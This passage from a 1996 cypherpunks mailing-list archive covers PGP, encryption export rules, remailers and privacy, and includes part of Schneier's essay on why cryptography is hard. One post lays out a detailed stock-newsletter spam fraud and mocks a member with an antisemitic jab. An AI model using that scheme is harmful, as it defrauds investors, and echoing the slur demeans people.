]>                 Oshawa, Ontario, Canada
]>                 L1J 6T6
]
]
]"When are you guys going to stop these gimmicks!?"
]
]At the begining of this year (1996) I came to Canada as an immegrant. Of
]course, the first step was to look for job. I went through all possible
]sources of information at Toronto: "Employment News" "Toronto Classified
]Address"....etc. Always, I was facing this type of attractive ads. to
]work from home and earn $1000 / week.
]
]As a newcomer I did not know what was going on, and I needed desperately
]an income (honest income) to feed myself and small family.
]
]I decided to try one of these ads. it was "Northern Communications
]Enterprise", Toronto, the name looked to me as a very large Corporation;
]since I was a newcomer and I have no idea about the real companies.
]
]I mailed a self addressed stamped envalope as requested; I receieve in
]return one tricky page article; asking me at the end to send a cheque
]with C$35 to send me the "Magical" information to earn $1000/week;
]unforetunatly, I did so!.
]
]After couple of weeks, I received a booklet of 30 pages (all junke and
]empty circle information) it ends teaching you that what you have to do
]is to paste or advertise simillar ads. to the one I read at the first
]time "Earn $1000/week from home by stuffing envalopes", in deffrent type
]of media (newspaper, internet, flyer....etc) and do the same trick by
]photocopying their valueless booklet and mail it to the person who paid
]me C$35.
]
]Of course, I didn't agree, not because I can not do it, but, because I
]refused to be a part of this illegal and immoral way of earning mony!.
]
]What concerns me, that how can reputable newspapers, and papers like
]"Employment news" justify their advertisement to such tricky and
]imaginary "Enterprises"  just for few dollars. These papers are supposed
]to be directed to people like me who was a serious individual and
]desperately looking for a job, and needed each Penny of his mony to
]establish himself at his new country!.
]
]"Please do not be victim to these types of ads."
]
]Regards to all.
]
]Mason.

"Credibility is expendable." -John Gilmore

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Mon, 11 Nov 1996 11:45:52 -0800 (PST)
To: "'Dale Thorn'" <dthorn@gte.net>
Subject: RE: Apology to Dale Thorn
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961111194442Z-2433@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn writes (in part):

>I'm tending to think that, instead of using PGP for all encoding (even
>though it may have multiple facilities for all situations), a message
>could be encrypted with a good trusted private-key system or whatever,
>then the private key encrypted with the Public Key software and sent
>either separately or with the message.

But you've described exactly what PGP does.  It encrypts the message
with a "good, trusted private-key system" -- IDEA, which has undergone
significant peer review, has a long-enough key (128 bits), and has
exhibited no significant weaknesses or shortcuts to brute force (which
is impossible, given the key length).  It then encrypts the IDEA session
key that was used with the recipient's public key, and bundles the the
IDEA-encrypted message and the RSA-encrypted session key (and
optionally, a signed hash of the message) for delivery to the recipient.

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Nov 1996 08:56:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: ENT_ice
Message-ID: <1.5.4.32.19961111165503.006adfec@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-11-96. WaPo Page One:

   "Preventing Terrorism: Where to Draw the Line? With
   Militias, U.S. Adopts Preemptive Strategy"

      This strategy requires aggressive and potentially
      controversial tactics as investigators infiltrate groups
      and bring charges on the basis of allegedly criminal
      plans that are conceived but not carried out. Federal
      agencies are more willing to launch investigations when
      people talk about committing violent acts, and
      investigators are more prone to use ordinary citizens as
      informants.

      According to legal experts, the mere discussion of a
      crime, no matter how fanciful it may be, can constitute
      a criminal conspiracy. "The classic example is that you
      are guilty of a crime if you conspire with someone else
      to stick pins in a voodoo doll in the belief that your
      enemy will fall dead," said Albert Alschuler, a law
      professor at the University of Chicago.

   -----

   http://jya.com/entice.txt  (13 kb)

   ENT_ice







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pablo Calamera <pablo@corp.webtv.net>
Date: Mon, 11 Nov 1996 11:56:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <v03007802aeac4fce1459@[204.254.74.48]>
Message-ID: <v03007803aead2dcf0204@[204.254.74.216]>
MIME-Version: 1.0
Content-Type: text/plain


>>Date: Fri, 08 Nov 1996 17:16:00 -0800
>>From: Tom Weinstein <tomw@netscape.com>
>>Organization: Netscape Communications, Inc.
>>MIME-Version: 1.0
>>To: cypherpunks@toad.com
>>Subject: Re: WebTV a "munition"
>>Sender: owner-cypherpunks@toad.com
>>Precedence: bulk
>>
>>Rich Graves wrote:
>>>
>>> Eric Murray wrote:
>>> >
>>> > Page 3 of the San Jose Mercury News has a small blurb
>>> > about WebTV's browser/set-top box that "uses
>>> > computer-security technology so powerful that the
>>> > government is classifying it as a weapon
>>> > that will require a special export license before
>>> > it can be sold overseas".[...]
>>> > shouldn't be too difficult.  If they didn't use the "export"
>>> > level SSL CipherTypes, then what're they up to?  Are they
>>> > fighting crypto export laws (for which they should be congratulated
>>> > and supported) or are they just looking for free publicity?
>>>
>>> Based on the lack of public policy pronouncements from the WebTV
>>> folks, I would answer C) They're clueless. I'm not sure that
>>> management even understood, or wanted to understand, that they'd have
>>> an export problem.
>>> See http://www.webtv.net/
>>
>>Since Pablo Calamera works there, they can't be too clueless.
>>
>>--
>>You should only break rules of style if you can    | Tom Weinstein
>>coherently explain what you gain by so doing.      | tomw@netscape.com
>>


To clarify a bit, we're not talking about SSL here.  Also, some how it was
infered by some readers of the article that we were astonished about the
munitions classification of our product.  We were not.

Oh... and yes, we are not the least bit clueless (thanks Tom).  Below is a
company statement we released:

The WebTV Network is currently using a 128 bit encryption system that
gives our U.S. subscribers the most sophisticated security protection of
any online service today. It is our intent to offer our customers the most
secure environment for transactions and transmission with their WebTV
Network service. Our units, sold by Sony and Philips, include a sticker
that states that the product is not to be exported outside of the United
States.

However, the government restriction does not prevent us from exporting our
product outside of the United States. WebTV Networks has always intended to
announce its expansion plans in early 1997, providing global communication
using either 40 bits, now authorized by the government, or 56 bits which
Bill Clinton recently endorsed.


Pablo



-----------------------------------------
| Pablo Calamera
| Security Architect
| WebTV Networks, Inc. http://webtv.net/
| 305 Lytton Avenue
| Palo Alto, CA 94301
| . . . . . . . . . . . . . . . . . . . .
| mailto:pablo@corp.webtv.net
| voice:(415) 614-2749
-----------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 11 Nov 1996 12:11:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: DC Net-politics reporter needed
Message-ID: <Pine.GSO.3.95.961111121025.1286N-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


A political publication is looking for an experienced journalist to cover
Net-happenings on Capitol Hill, in the White House, and in Federal
agencies. Let me know if you're interested and I'll forward your contact
info and clips to the right people.

-Declan








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Mon, 11 Nov 1996 09:29:19 -0800 (PST)
To: "Timothy C. May" <ph@netcom.com (Peter Hendrickson)
Subject: RE: "Nightmare on Crypto Street, Part 1"
Message-ID: <9610118477.AA847743847@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> wrote:
>I also summarize Peter's set up much as you did:
>
>"Suppose [A]. Suppose [B] ... [Then Z is likely].
 
In the middle of the Polish crisis, in the early 1980s, while there were riots
over the high cost of living and the lack of food, Tversky and Kahneman [seminal
cognitive science researchers] asked a number of political leaders and generals
to evaluate the probability [Scenario 1] that the United States might withdraw
its ambassador from the then Soviet Union (without any hypothesis as to why).
They further asked the same subjects to evaluate the probability [Scenario 2]
that _both_ of two other things would take place: (a) that the U.S.S.R. would
invade Poland and (b) that, as a consequence of the former, the United States
would withdraw its ambassador from the Soviet Union.

Guess which was scenario was assumed to have a higher probability.

These questionaire-experiments, just like real life, have countless times shown
us that a plausible and well-told story can lead us to hold as "objectively"
probable events that, just minutes before, we would have considered totally
improbable.

Probabilities being, by their nature, less than one, the probability of the
entire chain (or the last link) being true is always and without exception lass
probable than the probability of the least probable link in the chain.

We fail to notice this prograssive attenuation of probability. The story takes
over from reality. The trick - which is the oldest in the book - is to find the
narrative path by which the last, and most implausible, link can be made
imaginatively compelling.

Give us a little story, a script, something born of our own imagination, and our
own natural tendencies, cognitive or emotional, do the rest.

This discussion applies as well to the other script: Irreversible
Crypto-Anarchy, soon appearing on a street near you.

Ciao,
James

Quoted liberally from the book _Inevitable Illusions_ by Massimo
Piatelli-Palmarini, Ph.D. The author is a pricipal Research Associate of the
Center for Cognitive Science at MIT. I recommend the book.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 11:37:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Money-making ideas for Igor Chudov
In-Reply-To: <199611110436.WAA15563@manifold.algebra.com>
Message-ID: <Pso9wD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:

> manifold::~==>premail -t cypherpunks@toad.com
> Chain: haystack;jam
> Subject: I urgently need a lot of money.
>
> Please share your money-making secrets, I am in a desperate need
> for cash.

For shame! Igor Chewed-off disgraces his Chewish Mommy by even asking. Isn't
propensity for "gesheft" genetic? Here's another money-making idea for Igor:

Igor obtains a list of e-mail addresses of people interested in equity-related
investments (e.g. by watching misc.invest.* and sending the posters / those who
voted for their creation unsolicited e-mail; or by posting anonymous ads,
inviting the readers to reply to a reply block in order to receive 3 free
promotional issues of an investment advice newsletter; or even by starting up
his own private financial derivatives mailing list). Igor divides the mailing
list into 2^3=8 parts, and gives them exotic Russian-sounding names: Aleksej,
Boris, Vasilij, Grigorij, Dmitrij, Elena, Zhenja, Zoya.

Igor then uses an anonymous remailer to spam everyone on his mailing list with
the 8 variants of the following message: "Congratulations! You have won 3 free
issued of the _Boris Investment Newsletter, published in Tulsa, Oklahoma, by a
proud holder of a Master's Degree in Financial Engineering from the Moscow
State University. I predict that within the next month Adobe stock will go up."

Instead of "Boris", Igor will substitute one of the 8 newsletter names; instead
of Adobe, he can use any volatile stock that's as likely to go up as down; and
the predicted stock price movement will be "up" in the first four newsletters
and "down" in the other four.

One month later the stock in question is either up or down. Without loss of
generality, suppose that it's gone down. Aleksej, Boris, Vasilij, and
Grigorij's investment advice was wrong, they disappear from the face of the
earth, and the former recipients of their newsletters don't get bothered any
more. (Or they could be recycled for future scams; or they could be send the
remaining 2 issues of worthless advice, as promised.) On the other hand
Dmitrij, Elena, Zhenja, and Zoya guessed right, so this time they send out a
new investment newsletter via the anonymous remailers:

"Congratulations! You continue to receive the free investment advice newsletter
from Zoya in Tulsa, Oklahoma. Last month I correctly predicted that Adobe will
have gone down. If you're smart, you've shorted Adobe's stock and made lots of
money by now. This month I predict that Cisco will go _down as well."

Again, Dmitrij and Elena predict that some other volatile stock goes up, while
Zhenja and Zoya predict that it goes down. Suppose D&E are right. Igor leaves
the Zh.&Z. partitions alone. One month later D&E's subscribers get letter #3:

"Congratulations! You continue to receive the free investment advice newsletter
from Elena in Tulsa, Oklahoma. Two months ago I predicted that Adobe would go
down. I hope you sold it short. Last month I predicted that Cisco would go up.
I hope you bought it. This month I predict that Lucent will go _up."

One month later one of the two is right, so its recipients get the fourth and
final e-mail from an anonymous remailer, this time using a reply block:

"I've given you three free stock tips over the last 3 months which probably
made you a lot of money. Now that you've seen my track record, you'll want to
continue receiving my free advice, but the free promotion is over. Please send
$20 in untraceable digital cash to this reply block to receive 6 future
issues."

Quite a few people would risk the $20, but that would be the last they hear
from Igor. :-)

(Alternatively, he can even e-mail 6 more issues of worthless advice to those
who caughed up the $20, so they can't complain. It would be hard to prosecute
Igor without proving that all 8 newsletters were published by the same person
who's been giving contradictory advice to different people.)

"Credibility is expendable." - John Gilmore

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Barry A. Dobyns" <bdobyns@clueless.com>
Date: Mon, 11 Nov 1996 11:23:36 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Legal Deffinition of Encryption?
In-Reply-To: <v02140b02aeaba1c8961f@[192.0.2.1]>
Message-ID: <32871B52.153@clueless.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Peter Hendrickson wrote:
> > At 2:17 PM 11/9/1996, Mark M. wrote:
> > >On Sat, 9 Nov 1996, Benjamin Grosman wrote:
> > >> I have absolutely no idea: this is a very interesting problem. Not for just
> > >> compression and encryption differention legally, but also, well, ANY other
> > >> data form. If one defines a new format for saving data (i.e a new image
> > >> format), and then exports this technology from the USA, is this exportation
> > >> of munitions due to it's unknown qualities? Or what?
> 
> > > I can't define encryption, but I know it when I see it.
> 
> > They way it will be forbidden is by outlawing the execution of the
> > algorithms.  The algorithms (the secure ones anyway) are well defined
> > as is executing them.  The legal system has dealt with greater
> > ambiguities than this.
> > An analogy to the drug laws might be useful.  We don't outlaw all drugs
> > that cause you to have weird visions and to act strangely.  That would
> > be hard to define and would cover a number of legal drugs.
> > Instead, the specific chemicals are forbidden as they are discovered.
> 
> I can see how the chemical/drug thing works, and I can see how they can
> easily control Public Key (PGP) encryption, but if you are suggesting
> that they can effectively eradicate private key encryption, that would
> seem to be an impossibility.

I don't think that an alert legisator will have any problems writing
laws that cover
whatever uses of cryptography they want to outlaw.  (Finding an alert
legislator might be
more of a problem...)

Consider this:  outlawing an algorithm is very similar to protecting
it's use
as intellectual property - which is what the Patent system in the US and
most other
countries is designed to do.  The description of "illegal" algorithms
could be lifted
directly from patents (both current AND expired, or if you're
sufficiently paranoid,
even from "refused" or ungranted applications) which apply to
cryptography.  

Imagine the creation of a branch of your favorite Government, let's call
it "Big Brother," 
whose job is to monitor patent applications worldwide for new crypto
techniques solely for
the purpose of branding them contraband.  Not so different from some of
the work the US FDA does.

Note that the market lock that PKP/RSA has on public key encryption in
the US is 
based on exactly this sort of algorithm protection, and if it's good
enough to reign in 
unbridled capitolism, it'll be good enough for the Justice Department to
litigate on. 
In effect, since PKP holds all the patents on public key in the US,
nobody else can use
these techniques without paying PKP or their licencees.  Outlawing just
those techniques
which are embodied in the PKP patents would be sufficient to outlaw all
public key encryption.

Note that issues like "is the patent valid" usually hinge on whether the 
authors of the patent were indeed the originators of the idea.  In the
case 
of outlawing the algorithms, it doesn't matter if the patent author was
the 
originator or not, or even if the patent is valid, still current, or
was intercepted when it was applied for and diverted to "Big Brother" 
instead of being granted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 12:33:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <199611112033.MAA11915@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:30 AM 11/9/96 -0800, Dale Thorn wrote:
...
>FORTH has fallen out of favor for most PC users of the mid 1990's, but then 
>again, so have computer languages as a whole, since few persons write software 
>today as compared to the early 1980's.
...
I was tinkering around in Basic back then, I wasn't writing much of my own,
but I did know a few commands.  I remember when using "canned" software had
a certain stigma to it, like saying "you are not a true computer afficinado,
you don't even type in your own code."  I also remember that my dad taught
computer programming out of the back of magazines, ones with names like
TI/99er, Home Computing (is it still out there?), and K-Power.  Heck, even
3-2-1 Contact, the PBS based magazine had a source code section for a while.
I'm afraid I don't remember Forth, though I have heard of it, about as much
as my friends have heard of PGP.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Mon, 11 Nov 1996 09:52:27 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: His and Her Anarchies
Message-ID: <9610118477.AA847745509@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



"Timothy C. May" <tcmay@got.net> wrote:
>Well, I think there clearly _is_ a gender gap on these sorts of issues.

Technologies that matter make daily life less obnoxious, and you can leverage
them all the time. The Net is going to start mattering in a significant way when
it relieves people of the burden of dealing with the garbage inherent in the
information flow of everyday life. The net is going to matter when I can rely on
it to store the information I now keep on disk, and the computer is a completely
transparent object. All the documents that are important to me are maintained by
the Net with sufficient reliability that I can unplug my computer and smash it
with a hammer without affecting anything.

Under this scenario, strong, reliable crypto becomes similar to electricity. The
entire infomration infrastructure is built on it, but hardly anyone gives it a
second thought.

What kind of people use the Net and what are their activities doing to the
country, the world, the culture? It may sound like a parochial issue that women
don't much like computers, but they don't, and the issue is a tremendously
important one. They're not attracted to this world, certainly not to the extent
that men are, and that's one of the reasons why it is such a spiritually
impoverished world. Most reasonable sophisticated men are happier in an
environment that included women. One of the problems with the computer society
is that not only is it an almost all-male society, but it's part of a little-boy
society, part of an ongoing infantilization of the society over the past half
century.

Excerpt from Digerati: Encounters with the Cyber Elite (HardWired 1996) where
David Gelernter, a Yale computer scientist, comments on the Web.

>This may sound sexist. But sexism, like other "isms," is often based
> on plain old truth, however politically incorrect it may be to some.

>--Tim May

Galileo, you must recant. You are in blatant disagreement with the truth.

Ciao,
James






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 11 Nov 1996 10:38:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: DOUBLE the Reward for Errors in _Digital Cash_
Message-ID: <v02140b13aead207feeba@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Last week, I offered $10 for the first person to report any
technical errors in the first edition of my book, _Digital
Cash_. I got many good suggestions for additional topics to add
to the book, but not one mention of any errors.

So I'm doubling the reward. $20 for the first person to report a
technical error to me. The details and restrictions follow this
message.

I would also like to encourage people to continue to send
suggestions. If you thought some topics were covered too
lightly, let me know. This isn't a technical error, but I
reserve the right to reward you anyways. Also, I hope that any
company with new or improved products will write. One of the
biggest problems I've found in researching the book is finding
the right person to contact in a company. So I encourage you to
volunteer.

--Peter Wayner
(pcw@access.digex.net)


1) The offer may withdrawn at any time. Check my web page for
any changes.

2) The offer could be increased at any time, but it probably
won't be. So don't push your luck waiting for more money.

3) My decision on the "first" person to send me a technical
error is final. I may choose to reward both people if it is
clear that they found the error independently. The limitation is
necessary to keep people from telling their friend, "You want
$20? Just send this email message to this guy."

4) My decision on what constitutes a technical error is also
final. Errors in grammar or word choice are not rewarded. But
you're free to write about them. It's not that I don't want to
hear about them. I just think that the concept of "grammatical
error" is so ill-defined that I don't want to get in arguments
in that domain.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 11 Nov 1996 14:16:25 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Conspiring to commit voodoo
In-Reply-To: <v03007807aead26b2cf8c@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961111135201.12543A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 11 Nov 1996, Timothy C. May wrote:

> ...This benign neglect will probably change rather quickly if
> one of the offshore betting markets starts carrying odds that a
> particular judge or other public figure will be killed. And if
> he _is_ killed, look for interrogations of the AP "ringleaders"
> --and maybe many of the rest of us, who have spoken out for
> anarchy and the like...

Just a reminder of the appropriate response in such a case.
Just keep repeating the four magic words, "I want a lawyer."
Co-operation buys you NOTHING.  (I hereby christen this the
"Jewell Rule" for obvious and topical reasons.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Mon, 11 Nov 1996 14:22:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <v03007801aead576335d0@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>Black Unicorn makes a lot of good points regarding privacy.  One thing
>I wanted to follow up on:
>
>> Unfortunately, in the United States most citizens only become interested
>> in privacy in their 20s or so.  By this time it is difficult to overcome
>> the mass of information which has been stored up.  (Pseudocide can be an
>> attractive option for some perhaps).
[...]
>Are there other measures which parents could take while their children are
>young to get them off to a good start, privacy-wise?

Do not declare your children as dependants.  If you do then you are required
to get a SSN for them, but if you are willing to waive the tax savings there
is no requirement than children have a SSN.  Not having a handy universal
index number like a SSN makes it a lot harder for people to accumulate
statistics on your kids.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Mon, 11 Nov 1996 14:26:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <3283A25B.1D6E@ix.netcom.com>
Message-ID: <568952$6fv@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199611091610.LAA00420@pdj2-ra.F-REMOTE.CWRU.Edu>,
Peter D. Junger <junger@pdj2-ra.F-REMOTE.CWRU.Edu> wrote:
>As far as I know, the only person convicted of shipping cryptographic
>devices outside the U.S. without a license was guilty of shipping a
>satellite TV descrambler to Latin America.  So there is some sort of
>precedent.  (And, of course, no First Amendment problem.)

I had heard of this before, but it's odd, because the ITAR says that
among items _excluded_ from the munitions list are items:

121.1 Category XIII(b)(1)(viii):
Limited to receiving for radio broadcast, pay television or similar
restricted audience television of the consumer type, without digital encryption
and where digital decryption is limited to the video, audio or management
functions.

so it would seem a sattelite TV descrambler is not a munition.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoen3kZRiTErSPb1AQFpywQAic/fkZZQIFItzyt0tnKYtV5/CGXpABJl
ncRnl4ydG5LWyudrB9tb5fFhIqUtpp2I1MRoFgXWibEk2OwGXua7T91rSyw/AeG0
Reh+x0IJGYu4DdHBmrMwRTbAR5QgsC9Yai9j/cIsXXDBviXSKMBn8S5jTK0BvTKg
RwEamFu7QL4=
=JlNu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Mon, 11 Nov 1996 15:07:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: another possible remailer attack
Message-ID: <199611112300.PAA00754@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid writes:
>
> >> You want to know if Dimitri is the person regularly posting these
> >> messages. So, you use your powers as ISP to block his access to all
> >> remailers. If the public messages suddenly stop then you can be
> >> reasonably certain that Dimitri was sending them.
> > I'm not following something...just how to your "powers as ISP" affect a
> > remailer in, say, Holland, or one for that matter on another ISP? (As a
>
> Packet filtering at the ISP's router. If Dimitri can't connect to a
> remailer, he can't send anonymous messages. Sure there are a lot of hacks
> that could be done (like have sendmail on another system send it to a
> remailer) but such things could be detected and blocked by clever filters.

I disagree, it's easy to bounce mail through ANY Internet-connected
host running sendmail and thence to a remailer.

In fact this mail was sent that way, I bounced it through sun.com
before hitting a remailer.

> In fact, the ISP could just claim to be "going down for maintenance" and
> completely block Dimitri from the internet for a while.

Only if the Backbone Cabal (there is no Cabal) is re-formed
(and given special SuperPowers!) with the sole purpose of
blocking Dimitri from posting to cypherpunks.


> > Just as the Nazis could isolate spy transmitters by selectively
> > turning off electricity to different neigborhoods, so, too, can various
>
> Isolating spy transmitters by selectively cutting power is exactly
> alalogous to what I have suggested.

The spy transmitters couldn't bounce their transmissions off of
regular radio transmissions, could they?


Buck Satan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 11 Nov 1996 15:22:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis on the remailers
In-Reply-To: <199611082058.MAA01697@abraham.cs.berkeley.edu>
Message-ID: <199611112317.PAA09200@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Please, remailers, source block Vulis for a week.
> Remailer Fan
> 

Nope, sorry.  It's not in the remailer operators' interest to be in
the business to deciding who can and can't use the remailers
(esp. based on content of previous posts).  That would make the
operators responsible for content.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Nov 1996 12:41:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why Crypto Is Hard
Message-ID: <1.5.4.32.19961111203926.006af428@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


See the final version of Bruce Schneier's essay 
"Why Cryptography Is Harder Than It Looks ... " at:

     http://www.counterpane.com/whycrypto.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 11 Nov 1996 13:53:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why Cryptography is Harder than it Looks (LONG)
Message-ID: <v03007800aead3ea8c260@[204.246.66.55]>
MIME-Version: 1.0
Content-Type: text/plain


WHY CRYPTOGRAPHY IS HARDER THAN IT LOOKS
Bruce Schneier, Counterpane Systems

................................................................................
Copyright Nov 1996 by Bruce Schneier.  All rights reserved.  Permission is
given to distribute this essay, providing that it is distributed in its
entirety (including this copyright notice).  For more information on
Counterpane Systems's cryptography and security consulting, see
http://www.counterpane.com.
................................................................................


>From e-mail to cellular communications, from secure Web access to digital
cash, cryptography is an essential part of today's information systems.
Cryptography helps provide accountability, fairness, accuracy, and
confidentiality.  It can prevent fraud in electronic commerce and assure
the validity of financial transactions.  It can prove your identity or
protect your anonymity.  It can keep vandals from altering your Web page
and prevent industrial competitors from reading your confidential
documents.  And in the future, as commerce and communications continue to
move to computer networks, cryptography will become more and more vital.

But the cryptography now on the market doesn't provide the level of
security it advertises.  Most systems are not designed and implemented in
concert with cryptographers, but by engineers who thought of cryptography
as just another component.  It's not.  You can't make systems secure by
tacking on cryptography as an afterthought.  You have to know what you are
doing every step of the way, from conception through installation.

Billions of dollars are spent on computer security, and most of it is
wasted on insecure products.  After all, weak cryptography looks the same
on the shelf as strong cryptography.  Two e-mail encryption products may
have almost the same user interface, yet one is secure while the other
permits eavesdropping.  A comparison chart may suggest that two programs
have similar features, although one has gaping security holes that the
other doesn't.  An experienced cryptographer can tell the difference.  So
can a thief.

Present-day computer security is a house of cards; it may stand for now,
but it can't last.  Many insecure products have not yet been broken because
they are still in their infancy.  But when these products are widely used,
they will become tempting targets for criminals.  The press will publicize
the attacks, undermining public confidence in these systems.  Ultimately,
products will win or lose in the marketplace depending on the strength of
their security.

THREATS TO COMPUTER SYSTEMS

Every form of commerce ever invented has been subject to fraud, from rigged
scales in a farmers' market to counterfeit currency to phony invoices.
Electronic commerce schemes will also face fraud, through forgery,
misrepresentation, denial of service, and cheating.  In fact,
computerization makes the risks even greater, by allowing attacks that are
impossible against non-automated systems.  A thief can make a living
skimming a penny from every Visa cardholder.  You can't walk the streets
wearing a mask of someone else's face, but in the digital world it is easy
to impersonate others.  Only strong cryptography can protect against these
attacks.

Privacy violations are another threat.  Some attacks on privacy are
targeted:  a member of the press tries to read a public figure's e-mail, or
a company tries to intercept a competitor's communications.  Others are
broad data-harvesting attacks, searching a sea of data for interesting
information: a list of rich widows, AZT users, or people who view a
particular Web page.

Electronic vandalism is an increasingly serious problem. Computer vandals
have already graffitied the CIA's web page, mail-bombed Internet providers,
and canceled thousands of newsgroup messages.  And of course, vandals and
thieves routinely break into networked computer systems.  When security
safeguards aren't adequate, trespassers run little risk of getting caught.

Attackers don't follow rules; they cheat.  They can attack a system using
techniques the designers never thought of.  Art thieves have burgled homes
by cutting through the walls with a chain saw.  Home security systems, no
matter how expensive and sophisticated, won't  stand a chance against this
attack.  Computer thieves come through the walls too.  They steal technical
data, bribe insiders, modify software, and collude.  They take advantage of
technologies newer than the system, and even invent new mathematics to
attack the system with.

The odds favor the attacker.  Bad guys have more to gain by examining a
system than good guys.  Defenders have to protect against every possible
vulnerability, but an attacker only has to find one security flaw to
compromise the whole system.

WHAT CRYPTOGRAPHY CAN AND CAN'T DO

No one can guarantee 100% security.  But we can work toward 100% risk
acceptance.  Fraud exists in current commerce systems:  cash can be
counterfeited, checks altered, credit card numbers stolen.  Yet these
systems are still successful because the benefits and conveniences outweigh
the losses.  Privacy systems -- wall safes, door locks, curtains -- are not
perfect, but they're often good enough.  A good cryptographic system
strikes a balance between what is possible and what is acceptable.

Strong cryptography can withstand targeted attacks up to a point -- the
point at which it becomes easier to get the information some other way.  A
computer encryption program, no matter how good, will not prevent an
attacker from going through someone's garbage.  But it can prevent
data-harvesting attacks absolutely; no attacker can go through enough trash
to find every AZT user in the country.  And it can protect communications
against non-invasive attacks: it's one thing to tap a phone line from the
safety of the telephone central office, but quite another to break into
someone's house to install a bug.

The good news about cryptography is that we already have the algorithms and
protocols we need to secure our systems.  The bad news is that that was the
easy part; implementing the protocols successfully requires considerable
expertise.  The areas of security that interact with people -- key
management, human/computer interface security, access control -- often defy
